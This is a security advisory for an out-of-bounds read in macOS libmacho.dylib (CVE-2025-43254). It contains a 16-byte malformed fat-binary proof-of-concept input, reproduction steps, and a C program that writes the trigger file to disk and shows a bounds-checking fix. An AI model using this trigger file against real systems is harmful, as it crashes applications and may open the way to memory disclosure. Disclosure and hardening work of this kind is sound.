
RESEARCH – 2025-43254

Out-of-Bounds Memory Access in macOS libmacho.dylib

Overview

An out-of-bounds memory access has been identified in macOS's libmacho.dylib library. A specially crafted Mach-O fat binary makes the library read far beyond the end of its input buffer. The demonstrated effect is a crash of the processing application; the author assesses information disclosure or remote code execution as possible outcomes with further exploitation work.

  • Vulnerability Type: Out-of-bounds memory access
  • Severity: High
  • Affected Component: libmacho.dylib
  • Affected Versions: macOS Sonoma
  • CVE Identifier: CVE-2025-43254

Technical Details

Description

The vulnerability is in the swap_fat_arch function of libmacho.dylib, which byte-swaps the fat_arch entries (the per-architecture table) of a Mach-O fat binary between the big-endian on-disk order and host order. The library is used by the macOS file command to identify file types, so the bug is reachable through that common utility. The function does not validate the architecture count taken from the fat header before walking that many entries.

Supplying an extremely large architecture count (e.g., 0x80000003, over 2 billion entries, stored big-endian as 80 00 00 03) makes the function access memory far beyond the bounds of the input buffer; the first read of an unmapped page produces a segmentation fault.

Root Cause

The function swap_fat_arch takes a pointer to a fat header (x0, the first arm64 argument register) and the number of architectures (x1) as parameters but does not validate that:

1. The architecture count is plausible (it is trusted exactly as read from the file)

2. The resulting memory accesses remain within the buffer that holds the file

The vulnerability can be triggered at different points in the function:

1. At offset +12: ldur q0, [x9, #-0x10] (a 16-byte load) – When trying to load the fat header itself

2. At offset +24: ldr w10, [x9] – When trying to load an architecture entry

Proof of Concept

A malformed Mach-O fat binary with the following characteristics triggers the vulnerability:

00000000 cb fe ba be 80 00 00 03 00 00 00 00 00 01 00 00 |................|

Key elements:

  • Modified magic number: cb fe ba be (normally ca fe ba be)
  • Architecture count: 80 00 00 03 (0x80000003 = 2,147,483,651)

When this file is processed by an application that hands it to libmacho.dylib, the process crashes with: EXC_BAD_ACCESS (code=1, address=0x600020000000)

Reproduction Steps

1. Create a file with the above hex content.

2. Process it with a tool that uses libmacho.dylib (e.g., otool, lipo, etc.). Example: file poc_file
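As an added example that is not code from the advisory, from Apple, or from libmacho itself, the C program below does two things: it writes the 16-byte PoC from the hex dump to poc_file (the Reproduction Steps), and it shows the caller-side validation whose absence the Root Cause section describes, next to a naive version of that check which 0x80000003 slips past because the 32-bit product nfat_arch * sizeof(fat_arch) wraps to 60. The header size, entry size and FAT_MAGIC value are the public ones from <mach-o/fat.h>, copied inline so the program builds on a non-macOS host; fat_check, naive_fits, write_poc and the other helper names are assumptions for this example, and the PoC bytes are a constructed copy of the advisory's dump.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Constructed copies of the public <mach-o/fat.h> sizes and magic value,
 * so the example builds on any host, not only macOS. */
#define FAT_MAGIC       0xcafebabeu
#define FAT_HEADER_SIZE 8u   /* uint32 magic, uint32 nfat_arch */
#define FAT_ARCH_SIZE   20u  /* cputype, cpusubtype, offset, size, align */

/* Constructed copy of the 16-byte PoC shown in the advisory's hex dump. */
static const uint8_t poc_bytes[16] = {
    0xcb, 0xfe, 0xba, 0xbe,  0x80, 0x00, 0x00, 0x03,
    0x00, 0x00, 0x00, 0x00,  0x00, 0x01, 0x00, 0x00,
};

/* Fat header fields are stored big-endian on disk on every host. */
static uint32_t be32(const uint8_t *p) {
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8)  |  (uint32_t)p[3];
}

enum fat_status { FAT_OK = 0, FAT_SHORT = 1, FAT_BAD_MAGIC = 2, FAT_COUNT_TOO_LARGE = 3 };

/* The kind of check that lets 0x80000003 through: the uint32 product
 * nfat_arch * 20 wraps to 60, so "header + table" looks like 68 bytes. */
int naive_fits(uint32_t nfat_arch, size_t len) {
    uint32_t needed = FAT_HEADER_SIZE + nfat_arch * FAT_ARCH_SIZE;  /* wraps */
    return needed <= len;
}

/* Hypothetical caller-side check: validate magic and nfat_arch against the
 * real buffer length before any routine (e.g. swap_fat_arch) trusts the count.
 * Returns FAT_OK and stores the count in *nfat, or the reason for rejection. */
enum fat_status fat_check(const uint8_t *buf, size_t len, uint32_t *nfat) {
    if (len < FAT_HEADER_SIZE) return FAT_SHORT;
    if (be32(buf) != FAT_MAGIC) return FAT_BAD_MAGIC;
    uint32_t n = be32(buf + 4);
    /* Widen before multiplying so the product cannot wrap; the table must fit. */
    uint64_t needed = (uint64_t)FAT_HEADER_SIZE + (uint64_t)n * FAT_ARCH_SIZE;
    if (needed > len) return FAT_COUNT_TOO_LARGE;
    *nfat = n;
    return FAT_OK;
}

/* The PoC exactly as shipped: rejected on the magic alone. */
int check_poc_as_is(void) {
    uint32_t n = 0;
    return (int)fat_check(poc_bytes, sizeof poc_bytes, &n);
}

/* The same PoC with a genuine FAT_MAGIC, so the count check is the one that fires. */
int check_poc_real_magic(void) {
    uint8_t buf[sizeof poc_bytes];
    memcpy(buf, poc_bytes, sizeof buf);
    buf[0] = 0xca;
    uint32_t n = 0;
    return (int)fat_check(buf, sizeof buf, &n);
}

/* A well-formed header with one arch entry: 8 + 20 = 28 bytes. Returns nfat_arch. */
int check_single_arch(void) {
    uint8_t buf[28] = { 0xca, 0xfe, 0xba, 0xbe,  0x00, 0x00, 0x00, 0x01 };
    uint32_t n = 0;
    return fat_check(buf, sizeof buf, &n) == FAT_OK ? (int)n : -1;
}

/* Write the PoC to disk for `file poc_file` / `lipo -info poc_file` on macOS. */
int write_poc(const char *path) {
    FILE *f = fopen(path, "wb");
    if (!f) return -1;
    size_t w = fwrite(poc_bytes, 1, sizeof poc_bytes, f);
    return (fclose(f) == 0 && w == sizeof poc_bytes) ? 0 : -1;
}

int main(void) {
    if (write_poc("poc_file") != 0) { perror("poc_file"); return 1; }
    printf("naive check accepts 0x80000003 in a 128-byte buffer: %d\n",
           naive_fits(0x80000003u, 128));
    printf("fat_check on PoC with real magic: %d (3 = count too large)\n",
           check_poc_real_magic());
    printf("fat_check on 1-arch header: nfat_arch=%d\n", check_single_arch());
    return 0;
}
```

Build with cc -o fatcheck fatcheck.c and run it; on an affected macOS system, then point file poc_file or lipo -info poc_file at the file it writes. The hardening is the fat_check pattern: widen before multiplying, compare the table size against the real buffer length, and only then hand nfat_arch to anything that trusts it.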

Impact

This vulnerability could potentially allow attackers to:

1. Cause a Denial of Service: crash the file command and other applications that handle Mach-O files

2. Obtain Information Disclosure: potentially read memory outside the intended buffer

3. Achieve Remote Code Execution: with further exploitation, this could possibly lead to arbitrary code execution

The vulnerability is particularly concerning because:

  • libmacho.dylib is used by many system components
  • Processing of Mach-O files occurs in various contexts including when downloading, opening, or installing applications
  • It could be triggered through malicious files delivered via web, email, or other means

Disclosure Timeline

  • 04/04/2025: Vulnerability discovered
  • 04/05/2025: Reported to Apple Product Security
  • 29/07/2025: Apple discloses the vulnerability publicly